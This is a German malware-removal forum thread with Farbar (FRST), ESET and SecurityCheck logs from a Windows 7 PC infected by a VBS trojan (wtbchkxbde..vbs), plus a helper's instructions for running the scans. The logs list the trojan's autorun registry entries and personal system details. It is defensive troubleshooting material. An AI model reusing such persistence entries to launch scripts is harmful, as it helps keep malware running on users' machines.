(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe


==================== Registry (Whitelisted) ==================

HKLM\...\Run: [AmIcoSinglun64] => C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe [323584 2009-09-23] (Alcor Micro Corp.)
HKLM\...\Run: [mwlDaemon] => C:\Program Files (x86)\EgisTec MyWinLocker\x86\mwlDaemon.exe
HKLM\...\Run: [IgfxTray] => C:\Windows\system32\igfxtray.exe [166424 2010-04-21] (Intel Corporation)
HKLM\...\Run: [HotKeysCmds] => C:\Windows\system32\hkcmd.exe [391192 2010-04-21] (Intel Corporation)
HKLM\...\Run: [Persistence] => C:\Windows\system32\igfxpers.exe [413720 2010-04-21] (Intel Corporation)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [9996320 2010-01-20] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [877600 2010-01-20] (Realtek Semiconductor)
HKLM\...\Run: [AtherosBtStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe [585376 2010-05-25] (Atheros Commnucations)
HKLM\...\Run: [AthBtTray] => C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe [354464 2010-05-25] (Atheros Commnucations)
HKLM\...\Run: [Apoint] => C:\Program Files\Apoint2K\Apoint.exe [345648 2010-03-09] (Alps Electric Co., Ltd.)
HKLM\...\Run: [Acer ePower Management] => C:\Program Files\Acer\Acer PowerSmart Manager\ePowerTrayLauncher.exe [496160 2010-02-02] (Acer Incorporated)
HKLM\...\Run: [BCSSync] => C:\Program Files\Microsoft Office\Office14\BCSSync.exe [108144 2012-11-05] (Microsoft Corporation)
HKLM\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
HKLM-x32\...\Run: [BackupManagerTray] => C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe [260608 2010-03-09] (NewTech Infosystems, Inc.)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2010-04-21] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [LManager] => C:\Program Files (x86)\Launch Manager\LManager.exe [960080 2010-05-26] (Dritek System Inc.)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-02-12] (Apple Inc.)
HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe [689744 2014-02-20] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [49208 2011-10-28] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-02-21] (Apple Inc.)
HKLM-x32\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs"
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-2199740673-3875191607-274323708-1001\...\Run: [NetLimiter] => C:\Program Files\NetLimiter 3\NLClientApp.exe [2910208 2011-03-21] (Locktime Software)
HKU\S-1-5-21-2199740673-3875191607-274323708-1001\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
Startup: C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs ()

==================== Internet (Whitelisted) ====================

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com.ph/intl/en/
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKLM-x32 - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW
SearchScopes: HKCU - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW_deDE532
BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Adobe PDF Link Helper - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - c:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO-x32: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO-x32: Microsoft-Konto-Anmelde-Hilfsprogramm - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Tcpip\Parameters: [DhcpNameServer] 172.20.10.1

FireFox:
========
FF Plugin: @microsoft.com/GENUINE - disabled No File
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.0.6 - C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @microsoft.com/GENUINE - disabled No File
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 - C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3508.0205 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 - C:\Program Files (x86)\Google\Update\1.3.23.9\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 - C:\Program Files (x86)\Google\Update\1.3.23.9\npGoogleUpdate3.dll (Google Inc.)

Chrome:
=======
CHR Plugin: (Shockwave Flash) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\PepperFlash\11.7.700.202\pepflashplayer.dll No File
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\ppGoogleNaClPluginChrome.dll ()
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\pdf.dll ()
CHR Plugin: (Adobe Acrobat) - c:\Program Files (x86)\Adobe\Reader 9.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL (Microsoft Corporation)
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.135\npGoogleUpdate3.dll No File
CHR Plugin: (iTunes Application Detector) - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
CHR Extension: (Google Docs) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-05-15]
CHR Extension: (Google Drive) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-05-15]
CHR Extension: (YouTube) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-05-15]
CHR Extension: (Google-Suche) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-05-15]
CHR Extension: (Google Wallet) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-09-10]

==================== Services (Whitelisted) =================

R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe [440400 2014-02-20] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe [440400 2014-02-20] (Avira Operations GmbH & Co. KG)
R2 ePowerSvc; C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe [820768 2010-02-02] (Acer Incorporated)
R2 nlsvc; C:\Program Files\NetLimiter 3\nlsvc.exe [1845248 2011-03-21] (Locktime Software)
R2 RS_Service; C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe [260640 2010-01-29] (Acer Incorporated)

==================== Drivers (Whitelisted) ====================

U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-14] (Microsoft Corporation)
R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [108440 2013-12-22] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\Windows\System32\DRIVERS\avipbb.sys [131576 2013-12-22] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\System32\DRIVERS\avkmgr.sys [28600 2013-12-15] (Avira Operations GmbH & Co. KG)
R1 nltdi; C:\Program Files\NetLimiter 3\nltdi.sys [88200 2011-03-21] (Locktime Software)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]

==================== NetSvcs (Whitelisted) ===================


==================== One Month Created Files and Folders ========

2014-04-17 00:04 - 2014-04-17 00:04 - 00015773 _____ () C:\Users\Franz\Desktop\FRST.txt
2014-04-16 23:57 - 2014-04-16 23:59 - 00000041 _____ () C:\Users\Franz\Desktop\pw.txt
2014-04-16 23:53 - 2014-04-16 23:53 - 00000728 _____ () C:\Users\Franz\Desktop\JRT.txt
2014-04-16 23:46 - 2014-04-16 23:46 - 00000000 ____D () C:\Windows\ERUNT
2014-04-16 23:40 - 2014-04-16 23:40 - 00001134 _____ () C:\Users\Franz\Desktop\mbam.txt
2014-04-16 23:07 - 2014-04-16 23:10 - 00119512 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-04-16 23:06 - 2014-04-16 23:06 - 00001106 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-04-16 23:06 - 2014-04-03 09:51 - 00088280 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-04-16 23:06 - 2014-04-03 09:51 - 00063192 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-04-16 23:06 - 2014-04-03 09:50 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-04-16 02:56 - 2014-04-16 03:44 - 00000000 ____D () C:\Qoobox
2014-04-16 02:56 - 2014-04-16 03:35 - 00000000 ____D () C:\Windows\erdnt
2014-04-16 02:56 - 2011-06-26 08:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-04-16 02:56 - 2010-11-07 19:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-04-16 02:56 - 2009-04-20 06:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00098816 _____ () C:\Windows\sed.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00080412 _____ () C:\Windows\grep.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00068096 _____ () C:\Windows\zip.exe
2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\ProgramData\Panda Security
2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\Program Files (x86)\Panda USB Vaccine
2014-04-16 02:50 - 2014-04-16 02:50 - 00003072 _____ () C:\Windows\System32\Tasks\PandaUSBVaccine
2014-04-16 02:47 - 2014-04-16 02:48 - 05194807 ____R (Swearware) C:\Users\Franz\Desktop\ComboFix.exe
2014-04-14 11:21 - 2008-03-22 04:21 - 733980672 ___SH () C:\Users\Franz\Desktop\The Seeker-The Dark is Rising[2007]DvDrip[Eng]-FXG.avi
2014-04-14 11:19 - 2012-11-07 09:32 - 247528059 ___SH () C:\Users\Franz\Desktop\Amityville Horror 2 The Possession (Full Movie) - YouTube.flv
2014-04-14 11:19 - 2010-01-05 16:04 - 956607690 ___SH () C:\Users\Franz\Desktop\The Marine 2 (2010) DVDR DivXNL-Team.avi
2014-04-14 10:43 - 2014-04-17 00:04 - 00000000 ____D () C:\FRST
2014-04-14 10:40 - 2014-04-14 10:42 - 02157568 _____ (Farbar) C:\Users\Franz\Desktop\FRST64.exe
2014-04-11 05:39 - 2014-03-04 14:07 - 142602520 _____ (Microsoft Corporation) C:\Users\Franz\Desktop\wlsetup-all_16.4.3508.0205.exe
2014-04-07 09:32 - 2014-04-09 10:19 - 00000000 ____D () C:\[Smad-Cage]
2014-04-07 09:30 - 2014-04-07 09:30 - 00000000 ____D () C:\ProgramData\Kaspersky Lab Setup Files
2014-04-03 10:10 - 2014-04-12 01:15 - 00000000 ____D () C:\Users\Franz\Desktop\FPCD
2014-04-02 08:42 - 2014-04-16 22:12 - 00000000 ____D () C:\Users\Franz\Desktop\Antivir
2014-04-02 08:27 - 2014-04-02 08:27 - 00000000 ____D () C:\Windows\pss
2014-04-02 08:19 - 2014-04-02 08:54 - 00000000 ____D () C:\Users\Franz\AppData\Local\NPE
2014-04-02 08:19 - 2014-04-02 08:19 - 00000000 ____D () C:\ProgramData\Norton
2014-04-02 06:29 - 2013-02-01 10:07 - 557660892 _____ () C:\Users\Franz\Desktop\Bavaria Traumreise durch Bayern.mkv
2014-04-02 06:15 - 2013-03-03 06:17 - 3702646581 _____ () C:\Users\Franz\Desktop\Das grüne Wunder - Unser Wald.mkv
2014-04-01 04:51 - 2013-09-22 17:47 - 00073266 _____ () C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs
2014-03-25 09:41 - 2014-03-25 09:41 - 00003416 ____N () C:\bootsqm.dat
2014-03-25 09:40 - 2014-03-25 09:40 - 00000000 ____D () C:\found.001
2014-03-21 07:44 - 2014-03-24 01:36 - 00000000 ____D () C:\Users\Franz\AppData\Local\Microsoft Games
2014-03-19 13:05 - 2014-03-19 13:05 - 00000000 ____D () C:\Users\Franz\Desktop\Neu

==================== One Month Modified Files and Folders =======

2014-04-17 00:05 - 2014-04-17 00:04 - 00015773 _____ () C:\Users\Franz\Desktop\FRST.txt
2014-04-17 00:04 - 2014-04-14 10:43 - 00000000 ____D () C:\FRST
2014-04-17 00:02 - 2013-04-16 20:29 - 00000043 _____ () C:\Users\Public\Documents\AtherosServiceConfig.ini
2014-04-17 00:01 - 2013-04-16 20:09 - 00001104 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-04-17 00:01 - 2009-07-14 07:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-04-17 00:01 - 2009-07-14 06:51 - 00088288 _____ () C:\Windows\setupact.log
2014-04-17 00:00 - 2014-03-11 17:56 - 00000000 ____D () C:\AdwCleaner
2014-04-17 00:00 - 2013-04-16 19:13 - 01625695 _____ () C:\Windows\WindowsUpdate.log
2014-04-17 00:00 - 2010-05-11 01:15 - 00113344 _____ () C:\Windows\PFRO.log
2014-04-16 23:59 - 2014-04-16 23:57 - 00000041 _____ () C:\Users\Franz\Desktop\pw.txt
2014-04-16 23:53 - 2014-04-16 23:53 - 00000728 _____ () C:\Users\Franz\Desktop\JRT.txt
2014-04-16 23:46 - 2014-04-16 23:46 - 00000000 ____D () C:\Windows\ERUNT
2014-04-16 23:40 - 2014-04-16 23:40 - 00001134 _____ () C:\Users\Franz\Desktop\mbam.txt
2014-04-16 23:30 - 2013-04-16 20:09 - 00001108 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-04-16 23:10 - 2014-04-16 23:07 - 00119512 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-04-16 23:06 - 2014-04-16 23:06 - 00001106 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-04-16 22:12 - 2014-04-02 08:42 - 00000000 ____D () C:\Users\Franz\Desktop\Antivir
2014-04-16 03:44 - 2014-04-16 02:56 - 00000000 ____D () C:\Qoobox
2014-04-16 03:43 - 2009-07-14 05:20 - 00000000 __RHD () C:\Users\Default
2014-04-16 03:35 - 2014-04-16 02:56 - 00000000 ____D () C:\Windows\erdnt
2014-04-16 03:15 - 2009-07-14 04:34 - 00000215 _____ () C:\Windows\system.ini
2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\ProgramData\Panda Security
2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\Program Files (x86)\Panda USB Vaccine
2014-04-16 02:50 - 2014-04-16 02:50 - 00003072 _____ () C:\Windows\System32\Tasks\PandaUSBVaccine
2014-04-16 02:48 - 2014-04-16 02:47 - 05194807 ____R (Swearware) C:\Users\Franz\Desktop\ComboFix.exe
2014-04-15 10:30 - 2013-04-16 20:22 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\vlc
2014-04-15 08:31 - 2009-07-14 06:45 - 00022672 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-04-15 08:31 - 2009-07-14 06:45 - 00022672 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-04-14 11:21 - 2013-04-17 05:01 - 00696870 _____ () C:\Windows\system32\perfh007.dat
2014-04-14 11:21 - 2013-04-17 05:01 - 00148134 _____ () C:\Windows\system32\perfc007.dat
2014-04-14 11:21 - 2009-07-14 07:13 - 01612484 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-04-14 10:42 - 2014-04-14 10:40 - 02157568 _____ (Farbar) C:\Users\Franz\Desktop\FRST64.exe
2014-04-14 10:20 - 2013-04-16 21:29 - 00000000 ____D () C:\Setups
2014-04-12 01:15 - 2014-04-03 10:10 - 00000000 ____D () C:\Users\Franz\Desktop\FPCD
2014-04-09 11:28 - 2013-04-16 19:54 - 00000000 ___RD () C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
2014-04-09 10:19 - 2014-04-07 09:32 - 00000000 ____D () C:\[Smad-Cage]
2014-04-07 09:30 - 2014-04-07 09:30 - 00000000 ____D () C:\ProgramData\Kaspersky Lab Setup Files
2014-04-06 08:23 - 2013-04-16 20:09 - 00004104 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-04-06 08:23 - 2013-04-16 20:09 - 00003852 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-04-03 09:51 - 2014-04-16 23:06 - 00088280 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-04-03 09:51 - 2014-04-16 23:06 - 00063192 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-04-03 09:50 - 2014-04-16 23:06 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-04-02 08:54 - 2014-04-02 08:19 - 00000000 ____D () C:\Users\Franz\AppData\Local\NPE
2014-04-02 08:27 - 2014-04-02 08:27 - 00000000 ____D () C:\Windows\pss
2014-04-02 08:25 - 2013-04-16 20:39 - 00000000 ___RD () C:\Users\Franz\Desktop\Dropbox
2014-04-02 08:24 - 2013-04-16 20:35 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\Dropbox
2014-04-02 08:19 - 2014-04-02 08:19 - 00000000 ____D () C:\ProgramData\Norton
2014-04-02 08:03 - 2013-04-16 20:10 - 00002179 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-03-31 04:12 - 2014-02-28 13:54 - 00000000 ____D () C:\Users\Franz\Desktop\Fotos
2014-03-27 00:58 - 2013-10-03 22:57 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\uTorrent
2014-03-25 09:41 - 2014-03-25 09:41 - 00003416 ____N () C:\bootsqm.dat
2014-03-25 09:40 - 2014-03-25 09:40 - 00000000 ____D () C:\found.001
2014-03-24 01:36 - 2014-03-21 07:44 - 00000000 ____D () C:\Users\Franz\AppData\Local\Microsoft Games
2014-03-23 13:40 - 2014-02-28 13:57 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\iFunbox_UserCache
2014-03-19 13:05 - 2014-03-19 13:05 - 00000000 ____D () C:\Users\Franz\Desktop\Neu

Some content of TEMP:
====================
C:\Users\Franz\AppData\Local\Temp\avgnt.exe
C:\Users\Franz\AppData\Local\Temp\Quarantine.exe


==================== Bamital & volsnap Check =================

C:\Windows\System32\winlogon.exe => MD5 is legit
C:\Windows\System32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\System32\services.exe => MD5 is legit
C:\Windows\System32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\rpcss.dll => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit


LastRegBack: 2014-03-24 00:49

==================== End Of Log ============================

--- --- ---

schrauber 17.04.2014 19:35


ESET Online Scanner

  • Hier findest du eine bebilderte Anleitung zu ESET Online Scanner
  • Lade und starte Eset Online Scanner
  • Setze einen Haken bei Ja, ich bin mit den Nutzungsbedingungen einverstanden und klicke auf Starten.
  • Aktiviere die "Erkennung von eventuell unerwünschten Anwendungen" und wähle folgende Einstellungen.
  • Klicke auf Starten.
  • Die Signaturen werden heruntergeladen, der Scan beginnt automatisch.
  • Klicke am Ende des Suchlaufs auf Fertig stellen.
  • Schließe das Fenster von ESET.
  • Explorer öffnen.
  • C:\Programme\Eset\EsetOnlineScanner\log.txt (bei 64 Bit auch C:\Programme (x86)\Eset\EsetOnlineScanner\log.txt) suchen und mit Deinem Editor öffnen (bebildert).
  • Logfile hier posten.
  • Deinstallation: Systemsteuerung => Software / Programme deinstallieren => Eset Online Scanner V3 entfernen.
  • Manuell folgenden Ordner löschen und Papierkorb leeren => C:\Programme\Eset


Downloade Dir bitte SecurityCheck und:

  • Speichere es auf dem Desktop.
  • Starte SecurityCheck.exe und folge den Anweisungen in der DOS-Box.
  • Wenn der Scan beendet wurde sollte sich ein Textdokument (checkup.txt) öffnen.
Poste den Inhalt bitte hier.

und ein frisches FRST log bitte. Noch Probleme? :)

fxak 17.04.2014 22:48

Habe alles so gemacht wie geschildert, aber dadurch wurde ja jetzt nichts entfernt oder?
Virus ist weiterhin vorhanden, sichtbar auch im FRST-Log, die .vbs erscheint nach formatieren wieder auf dem USB-Stick, auch wenn der Pfad im ESET-Log nicht auftaucht

ESET-Log:
Code:

ESETSmartInstaller@High as downloader log:
all ok
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.6920
# api_version=3.0.2
# EOSSerial=ac2dffd99c948343bad200af6691bd9b
# engine=17931
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=false
# unsafe_checked=false
# antistealth_checked=true
# utc_time=2014-04-17 08:53:19
# local_time=2014-04-17 10:53:19 (+0100, Mitteleuropäische Sommerzeit)
# country="Germany"
# lang=1033
# osver=6.1.7600 NT
# compatibility_mode=1799 16775165 100 96 2348631 31625798 2958932 0
# compatibility_mode=5893 16776574 100 94 31600355 149397849 0 0
# scanned=203094
# found=4
# cleaned=0
# scan_time=5260
sh=410B32FD3FE4642644AD91AC60C69B86EC2762DD ft=1 fh=0e378a435beab91a vn="a variant of Win32/Adware.Yontoo.B application" ac=I fn="C:\AdwCleaner\Quarantine\C\ProgramData\Tarma Installer\{361E80BE-388B-4270-BF54-A10C2B756504}\_Setupx.dll.vir"
sh=0000000000000000000000000000000000000000 ft=- fh=0000000000000000 vn="VBS/Kryptik.T trojan" ac=I fn="C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs"
sh=55815CF83BD6B40E6AF7740222412B49191FA0BB ft=0 fh=0000000000000000 vn="VBS/Kryptik.T trojan" ac=I fn="C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs"
sh=55815CF83BD6B40E6AF7740222412B49191FA0BB ft=0 fh=0000000000000000 vn="VBS/Kryptik.T trojan" ac=I fn="C:\Users\Franz\Desktop\Antivir\Trojanerboard\wtbchkxbde..txt"

Security Check:
Code:

Results of screen317's Security Check version 0.99.81 
 Windows 7  x64 (UAC is disabled!) 
 Out of date service pack!!
 Internet Explorer 11 
``````````````Antivirus/Firewall Check:``````````````
Avira Desktop 
 Antivirus out of date! (On Access scanning disabled!)
`````````Anti-malware/Other Utilities Check:`````````
 Adobe Flash Player 10 Flash Player out of Date!
 Adobe Reader 9 Adobe Reader out of Date!
 Mozilla Thunderbird (24.3.0)
 Google Chrome 33.0.1750.146 
 Google Chrome 33.0.1750.154 
````````Process Check: objlist.exe by Laurent```````` 
 Avira Antivir avgnt.exe
 Avira Antivir avguard.exe
`````````````````System Health check`````````````````
 Total Fragmentation on Drive C: 
````````````````````End of Log``````````````````````


FRST:

FRST Logfile:
Code:

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 13-04-2014 01
Ran by Franz (administrator) on FRANZ-PC on 17-04-2014 23:36:08
Running from C:\Users\Franz\Desktop
Windows 7 Home Premium (X64) OS Language: German Standard
Internet Explorer Version 9
Boot Mode: Normal


==================== Processes (Whitelisted) =================

(AMD) C:\Windows\system32\atiesrxx.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AMD) C:\Windows\system32\atieclxx.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\adminservice.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\dsiwmis.exe
(Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Locktime Software) C:\Program Files\NetLimiter 3\nlsvc.exe
